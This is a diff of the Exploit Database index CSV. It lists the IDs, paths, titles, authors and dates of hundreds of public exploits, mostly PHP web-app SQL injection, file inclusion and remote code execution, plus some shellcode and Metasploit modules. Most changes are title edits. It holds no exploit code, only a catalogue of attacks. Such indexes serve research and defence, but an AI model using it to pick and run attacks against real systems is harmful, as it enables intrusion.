 41146,platforms/windows/remote/41146.rb,"DiskSavvy Enterprise - GET Buffer Overflow (Metasploit)",2017-01-23,Metasploit,windows,remote,80
 41148,platforms/windows/remote/41148.html,"Cisco WebEx - 'nativeMessaging' Arbitrary Remote Command Execution",2017-01-24,"Google Security Research",windows,remote,0
-41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - nsSMILTimeContainer::NotifyTimeChange() Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
+41151,platforms/windows/remote/41151.rb,"Mozilla Firefox < 50.0.2 - 'nsSMILTimeContainer::NotifyTimeChange()' Remote Code Execution (Metasploit)",2017-01-24,Metasploit,windows,remote,0
+41153,platforms/windows/remote/41153.rb,"Geutebrueck GCore 1.3.8.42/1.4.2.37 - Remote Code Execution (Metasploit)",2017-01-24,"Maurice Popp",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15975,7 +15979,7 @@ id,file,description,date,author,platform,type,port
 1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - xmlrpc.php SQL Injection",2005-07-04,RusH,php,webapps,0
 1083,platforms/php/webapps/1083.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)",2005-07-04,dukenn,php,webapps,0
 1084,platforms/php/webapps/1084.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps,0
-1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 <= 4.6.1 - Comments PHP Injection",2005-07-05,dab,php,webapps,0
+1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 < 4.6.1 - Comments PHP Injection",2005-07-05,dab,php,webapps,0
 1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-08,D|ablo,php,webapps,0
 1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure",2005-07-11,LazyCrs,php,webapps,0
 1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0
@ -16073,7 +16077,7 @@ id,file,description,date,author,platform,type,port
 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0
 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
-1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
+1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
 1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0
 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0
@ -16190,7 +16194,7 @@ id,file,description,date,author,platform,type,port
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
 1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
-1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
+1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
 1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0
 1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0
 1704,platforms/php/webapps/1704.pl,"CoreNews 2.0.1 - 'userid' Parameter SQL Injection",2006-04-21,nukedx,php,webapps,0
@ -16372,7 +16376,7 @@ id,file,description,date,author,platform,type,port
 1955,platforms/php/webapps/1955.txt,"Mambo Module CBSms 1.0 - Remote File Inclusion",2006-06-26,Kw3[R]Ln,php,webapps,0
 1956,platforms/php/webapps/1956.txt,"Mambo Component Pearl 1.6 - Multiple Remote File Inclusion",2006-06-27,Kw3[R]Ln,php,webapps,0
 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - 'forumid' Parameter SQL Injection",2006-06-27,simo64,php,webapps,0
-1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0
+1959,platforms/php/webapps/1959.txt,"RsGallery2 < 1.11.2 - 'rsgallery.html.php' File Inclusion",2006-06-28,marriottvn,php,webapps,0
 1960,platforms/php/webapps/1960.php,"Blog:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0
 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module - (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0
 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0
@ -16398,7 +16402,7 @@ id,file,description,date,author,platform,type,port
 2007,platforms/php/webapps/2007.php,"phpBB 3 - 'memberlist.php' SQL Injection",2006-07-13,rgod,php,webapps,0
 2008,platforms/php/webapps/2008.php,"Phorum 5 - 'pm.php' Arbitrary Local Inclusion Exploit",2006-07-13,rgod,php,webapps,0
 2009,platforms/php/webapps/2009.txt,"CzarNews 1.14 - 'tpath' Parameter Remote File Inclusion",2006-07-13,SHiKaA,php,webapps,0
-2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0
+2010,platforms/php/webapps/2010.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (1)",2006-07-14,RusH,php,webapps,0
 2012,platforms/php/webapps/2012.php,"MyBulletinBoard (MyBB) 1.1.5 - 'CLIENT-IP' SQL Injection",2006-07-15,rgod,php,webapps,0
 2018,platforms/php/webapps/2018.txt,"FlushCMS 1.0.0-pre2 - 'class.rich.php' Remote File Inclusion",2006-07-16,igi,php,webapps,0
 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0
@ -16414,7 +16418,7 @@ id,file,description,date,author,platform,type,port
 2029,platforms/php/webapps/2029.txt,"Mambo Component pollxt 1.22.07 - Remote File Inclusion",2006-07-17,vitux,php,webapps,0
 2030,platforms/php/webapps/2030.txt,"Mambo Component MiniBB 1.5a - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Blind SQL Injection",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
-2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
+2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 < 2.1.6 - SQL Injection (2)",2006-07-18,"w4g.not null",php,webapps,0
 2035,platforms/php/webapps/2035.php,"ToendaCMS 1.0.0 - 'FCKeditor' Arbitrary File Upload",2006-07-18,rgod,php,webapps,0
 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0
@ -16437,7 +16441,7 @@ id,file,description,date,author,platform,type,port
 2084,platforms/php/webapps/2084.txt,"Mambo Component MGM 0.95r2 - Remote File Inclusion",2006-07-28,"A-S-T TEAM",php,webapps,0
 2085,platforms/php/webapps/2085.txt,"Mambo Component 'com_colophon' 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0
 2086,platforms/php/webapps/2086.txt,"Mambo Component mambatStaff 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0
-2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0
+2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 < 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0
 2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps,0
 2089,platforms/php/webapps/2089.txt,"Mambo Component User Home Pages 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0
 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0
@ -16561,7 +16565,7 @@ id,file,description,date,author,platform,type,port
 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0
 2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
 2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - 'functions_mod_user.php' Remote File Inclusion",2006-08-23,nukedx,php,webapps,0
-2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0
+2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 < 2006.2a (lng) - Remote Command Execution",2006-08-24,Hessam-x,php,webapps,0
 2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 - basename() Remote Command Execution",2006-08-24,Kacper,php,webapps,0
 2254,platforms/php/webapps/2254.txt,"PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion",2006-08-24,Timq,php,webapps,0
 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0
@ -16574,7 +16578,7 @@ id,file,description,date,author,platform,type,port
 2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - 'main.php' Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0
 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products - 'id' Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injections",2006-08-28,"Tan Chew Keong",cgi,webapps,0
-2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution",2006-08-28,rgod,php,webapps,0
+2268,platforms/php/webapps/2268.php,"e107 < 0.75 - (GLOBALS Overwrite) Remote Code Execution",2006-08-28,rgod,php,webapps,0
 2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote File Inclusion",2006-08-28,SHiKaA,php,webapps,0
 2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution",2006-08-29,Kacper,php,webapps,0
 2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote File Inclusion",2006-08-29,"Mehmet Ince",php,webapps,0
@ -16657,7 +16661,7 @@ id,file,description,date,author,platform,type,port
 2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0
 2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0
 2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L - 'com_contact' Remote Code Execution",2006-09-15,rgod,php,webapps,0
-2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) SQL Injection",2006-09-15,"Fix TR",asp,webapps,0
+2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 < 1.1 - (tr) SQL Injection",2006-09-15,"Fix TR",asp,webapps,0
 2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0
 2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion",2006-09-15,Kacper,php,webapps,0
 2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Arbitrary File Upload",2006-09-15,simo64,php,webapps,0
@ -16676,7 +16680,7 @@ id,file,description,date,author,platform,type,port
 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - 'Review.asp' SQL Injection",2006-09-17,ajann,asp,webapps,0
 2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - 'users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps,0
 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0
-2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
+2390,platforms/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Parameter Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0
 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0
 2392,platforms/php/webapps/2392.txt,"Pie Cart Pro - (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0
 2393,platforms/php/webapps/2393.txt,"Pie Cart Pro - (Inc_Dir) Remote File Inclusion",2006-09-19,SnIpEr_SA,php,webapps,0
@ -16688,14 +16692,14 @@ id,file,description,date,author,platform,type,port
 2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - 'ROOT_PATH' Remote File Inclusion",2006-09-19,ajann,php,webapps,0
 2402,platforms/php/webapps/2402.php,"PHP Blue Dragon CMS 2.9.1 - (Cross-Site Scripting / SQL Injection) Code Execution",2006-09-20,Kacper,php,webapps,0
 2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - 'cfg_serverpath' Parameter Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0
-2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0
+2406,platforms/php/webapps/2406.php,"exV2 < 2.0.4.3 - (sort) SQL Injection",2006-09-21,rgod,php,webapps,0
 2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0
 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - 'dix.php3' Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0
 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0
 2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - 'RR.php' Remote File Inclusion",2006-09-21,Kacper,php,webapps,0
 2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion",2006-09-21,Kacper,php,webapps,0
 2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - File Inclusion / Cross-Site Scripting / Full Path Disclosure",2006-09-21,"HACKERS PAL",php,webapps,0
-2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution",2006-09-22,rgod,php,webapps,0
+2415,platforms/php/webapps/2415.php,"exV2 < 2.0.4.3 - extract() Remote Command Execution",2006-09-22,rgod,php,webapps,0
 2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - 'kategori.asp' SQL Injection",2006-09-22,Muhacir,asp,webapps,0
 2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - 'index.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0
 2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - 'all_users.php' SQL Injection",2006-09-22,"HACKERS PAL",php,webapps,0
@ -16715,7 +16719,7 @@ id,file,description,date,author,platform,type,port
 2435,platforms/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps,0
 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps,0
 2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion",2006-09-26,Kacper,php,webapps,0
-2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - 'hit.php' Remote File Inclusion",2006-09-26,D_7J,php,webapps,0
+2438,platforms/php/webapps/2438.txt,"Kietu? < 4.0.0b2 - 'hit.php' Remote File Inclusion",2006-09-26,D_7J,php,webapps,0
 2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - 'editfunc.inc.php' File Inclusion",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0
 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 - PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0
 2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion",2006-09-27,v1per-haCker,php,webapps,0
@ -16731,7 +16735,7 @@ id,file,description,date,author,platform,type,port
 2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - 'pdf.php' Remote File Inclusion",2006-09-29,Kacper,php,webapps,0
 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a - 'display.php' SQL Injection",2006-09-29,Trex,php,webapps,0
 2457,platforms/php/webapps/2457.php,"UBB.Threads 6.5.1.1 - 'doeditconfig.php' Code Execution",2006-09-29,"HACKERS PAL",php,webapps,0
-2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0
+2459,platforms/php/webapps/2459.txt,"Forum82 < 2.5.2b - (repertorylevel) Multiple File Inclusion",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0
 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0
 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0
 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0
@ -16931,7 +16935,7 @@ id,file,description,date,author,platform,type,port
 2707,platforms/php/webapps/2707.php,"PostNuke 0.763 - (PNSV lang) Remote Code Execution",2006-11-03,Kacper,php,webapps,0
 2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager - (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
 2710,platforms/php/webapps/2710.txt,"Ariadne 2.4 - store_config[code] Remote File Inclusion",2006-11-04,"Mehmet Ince",php,webapps,0
-2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Inclusion",2006-11-04,Kacper,php,webapps,0
+2711,platforms/php/webapps/2711.php,"e107 < 0.75 - (e107language_e107cookie) Local File Inclusion",2006-11-04,Kacper,php,webapps,0
 2712,platforms/php/webapps/2712.php,"MDPro 1.0.76 - (Cookie: PNSVlang) Local File Inclusion",2006-11-04,Kacper,php,webapps,0
 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0
 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0
@ -17035,7 +17039,7 @@ id,file,description,date,author,platform,type,port
 2849,platforms/asp/webapps/2849.txt,"ASP-Nuke Community 1.5 - Cookie Privilege Escalation",2006-11-25,ajann,asp,webapps,0
 2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - 'styles.php' Remote File Inclusion",2006-11-25,Kacper,php,webapps,0
 2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps,0
-2852,platforms/php/webapps/2852.txt,"Mambo Component com_flyspray <= 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0
+2852,platforms/php/webapps/2852.txt,"Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0
 2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - 'admin/edit.asp' SQL Injection",2006-11-26,bolivar,asp,webapps,0
 2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure",2006-11-28,rgod,php,webapps,0
 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0
@ -17749,7 +17753,7 @@ id,file,description,date,author,platform,type,port
 4020,platforms/php/webapps/4020.php,"RevokeBB 1.0 RC4 - Blind SQL Injection / Hash Retrieve Exploit",2007-06-01,BlackHawk,php,webapps,0
 4022,platforms/php/webapps/4022.htm,"XOOPS Module icontent 1.0/4.5 - Remote File Inclusion",2007-06-01,GoLd_M,php,webapps,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart 2.2 - Remote File Inclusion / Local File Inclusion Remote Code Execution",2007-06-02,Kacper,php,webapps,0
-4026,platforms/php/webapps/4026.php,"PNPHPBB2 <= 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0
+4026,platforms/php/webapps/4026.php,"PNPHPBB2 < 1.2 - 'index.php' SQL Injection",2007-06-03,Kacper,php,webapps,0
 4029,platforms/php/webapps/4029.php,"Sendcard 3.4.1 - (Local File Inclusion) Remote Code Execution",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp 1.3.2 - 'listmembers.php' SQL Injection",2007-06-04,Silentz,php,webapps,0
 4031,platforms/php/webapps/4031.txt,"Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion",2007-06-04,BoZKuRTSeRDaR,php,webapps,0
@ -17791,7 +17795,7 @@ id,file,description,date,author,platform,type,port
 4096,platforms/php/webapps/4096.php,"Pluxml 0.3.1 - Remote Code Execution",2007-06-24,DarkFig,php,webapps,0
 4097,platforms/php/webapps/4097.txt,"dagger Web engine 23jan2007 - Remote File Inclusion",2007-06-24,Katatafish,php,webapps,0
 4098,platforms/php/webapps/4098.php,"Simple Invoices 2007 05 25 - 'index.php submit' SQL Injection",2007-06-24,Kacper,php,webapps,0
-4099,platforms/php/webapps/4099.txt,"e107 <= 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0
+4099,platforms/php/webapps/4099.txt,"e107 < 0.7.8 - (photograph) Arbitrary File Upload",2007-06-24,g00ns,php,webapps,0
 4100,platforms/php/webapps/4100.txt,"phpTrafficA 1.4.2 - (pageid) SQL Injection",2007-06-24,"laurent gaffiÃ©",php,webapps,0
 4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - 'footer.inc.php tfooter' Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0
 4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,php,webapps,0
@ -17801,7 +17805,7 @@ id,file,description,date,author,platform,type,port
 4107,platforms/php/webapps/4107.txt,"Pagetool 1.07 - (news_id) SQL Injection",2007-06-25,Katatafish,php,webapps,0
 4108,platforms/php/webapps/4108.txt,"eDocStore - 'doc.php doc_id' SQL Injection",2007-06-25,t0pP8uZz,php,webapps,0
 4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - 'pcltar.lib.php' Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0
-4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
+4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 < 2.2 - 'index.php3' Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
 4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - 'wp-app.php' Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
 4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
 4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Parameter Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
@ -17826,7 +17830,7 @@ id,file,description,date,author,platform,type,port
 4142,platforms/php/webapps/4142.txt,"Girlserv ads 1.5 - 'details_news.php' SQL Injection",2007-07-03,"Cold Zero",php,webapps,0
 4144,platforms/php/webapps/4144.php,"MyCMS 0.9.8 - Remote Command Execution (2)",2007-07-03,BlackHawk,php,webapps,0
 4145,platforms/php/webapps/4145.php,"MyCMS 0.9.8 - Remote Command Execution (1)",2007-07-03,BlackHawk,php,webapps,0
-4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0
+4147,platforms/php/webapps/4147.php,"PNPHPBB2 < 1.2i - 'viewforum.php' SQL Injection",2007-07-03,Coloss,php,webapps,0
 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0
 4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - 'callboth.php' Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0
 4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0
@ -17952,7 +17956,7 @@ id,file,description,date,author,platform,type,port
 4390,platforms/php/webapps/4390.txt,"AuraCMS 2.1 - Remote File Attachment / Local File Inclusion",2007-09-10,k1tk4t,php,webapps,0
 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0
-4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
+4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 < 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
@ -18233,7 +18237,7 @@ id,file,description,date,author,platform,type,port
 4793,platforms/php/webapps/4793.txt,"Blakord Portal Beta 1.3.A - (all modules) SQL Injection",2007-12-26,JosS,php,webapps,0
 4794,platforms/php/webapps/4794.pl,"XZero Community Classifieds 4.95.11 - Local File Inclusion / SQL Injection",2007-12-26,Kw3[R]Ln,php,webapps,0
 4795,platforms/php/webapps/4795.txt,"XZero Community Classifieds 4.95.11 - Remote File Inclusion",2007-12-26,Kw3[R]Ln,php,webapps,0
-4796,platforms/php/webapps/4796.txt,"PNPHPBB2 <= 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
+4796,platforms/php/webapps/4796.txt,"PNPHPBB2 < 1.2i - 'PHPEx' Parameter Local File Inclusion",2007-12-26,irk4z,php,webapps,0
 4798,platforms/php/webapps/4798.php,"ZeusCMS 0.3 - Blind SQL Injection",2007-12-27,EgiX,php,webapps,0
 4799,platforms/php/webapps/4799.txt,"Joovili 3.0.6 - 'joovili.images.php' Remote File Disclosure",2007-12-27,EcHoLL,php,webapps,0
 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 - showcode.php Remote Command Execution",2007-12-28,MhZ91,php,webapps,0
